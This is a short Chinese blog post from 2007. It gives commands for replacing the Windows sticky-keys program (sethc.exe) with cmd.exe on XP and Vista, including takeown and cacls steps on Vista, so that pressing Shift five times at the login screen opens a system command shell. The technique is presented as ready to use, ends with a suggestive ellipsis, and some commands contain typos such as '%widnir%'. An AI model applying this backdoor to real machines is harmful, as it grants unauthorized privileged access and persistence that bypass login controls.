在windows 2000/xp/vista下，按shift键5次，可以打开粘置，会运行sethc.exe，而且，在登录界面里也可以打开。这就让人联想到WINDOWS的屏保，将程序替换成cmd.exe后，就可以打开shell了。

参考McafeeAvertLabs：
http://www.avertlabs.com/research/blog/?p=218

XP：
将安装源光盘弹出（或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe

VISTA：
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替换文件

在登录界面按5此SHIFT，出来cmd shell，然后……

发表于 @ 2007年03月14日 09:46:00|评论(loading...)

新一篇: Ubuntu Linux下与MOTO E2手机进行USB NET连接 | 旧一篇: 批处理应用：根据文件内容进行重命名操作